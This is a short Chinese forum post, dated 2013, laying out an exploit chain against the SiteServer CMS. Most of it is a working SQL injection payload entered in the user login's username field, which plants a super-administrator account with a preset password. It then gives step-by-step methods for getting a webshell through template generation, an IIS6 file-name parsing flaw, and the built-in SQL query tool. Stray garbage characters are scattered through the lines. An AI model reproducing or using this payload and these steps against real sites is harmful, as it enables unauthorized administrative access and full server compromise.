经测试秒杀最新的3.5版" H* ?. ` h6 u y( u3 ]7 U$ v
stieserver官网:www.siteserver.cn5 W- s+ l# h, U2 e' l
EXP:
6 T6 [; R0 U; {1 @8 |! C7 {+ Y直接访问UserCenter/login.aspx
) v2 f. R' P8 ]7 R: A1 t+ n+ `, w用户名处输入:5 C1 a7 E$ }; J8 |
$ H* ]4 q5 L: X7 X% k123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
* M, R+ `! o4 r: ~$ ]- C% e: e2 q密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。) j B5 s9 F e# Y5 Y) S1 ?
之后再访问后台SiteServer/login.aspx用插入的用户登陆4 p& x, W) R$ e7 Z+ g
后台拿webshell的三种方法:, ?' M6 r+ W! n( e
一、
) p; L2 d) D* m+ X站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx6 a! ^% v% O. [- ]' N5 g
二、* W! X0 z2 F Z+ a8 \9 c* d
成员权限-》添加用户-》用户名为:1.asp) l7 w% \& ~4 W* R& Z, O/ D% y
http://127.0.0.1/usercenter/
2 Z4 ^" E0 I( X( |: p4 m/ W1 X用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
7 {( z9 ^) z& ?(ps:后台添加用户时不会验证是否含有非法字符)9 j( Z n5 Z( R) X. b
三、
, p1 u! `% y! R- o+ g% N系统工具-》实用工具-》机器参数查看
: p, d7 o+ g7 \6 N0 v) `5 @可以看到数据库类型、名称,WEB路径
: X+ B O1 R& w2 _0 a/ P1 C系统工具-》数据库工具-》SQL语句查询; S% {5 ~: @! @
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对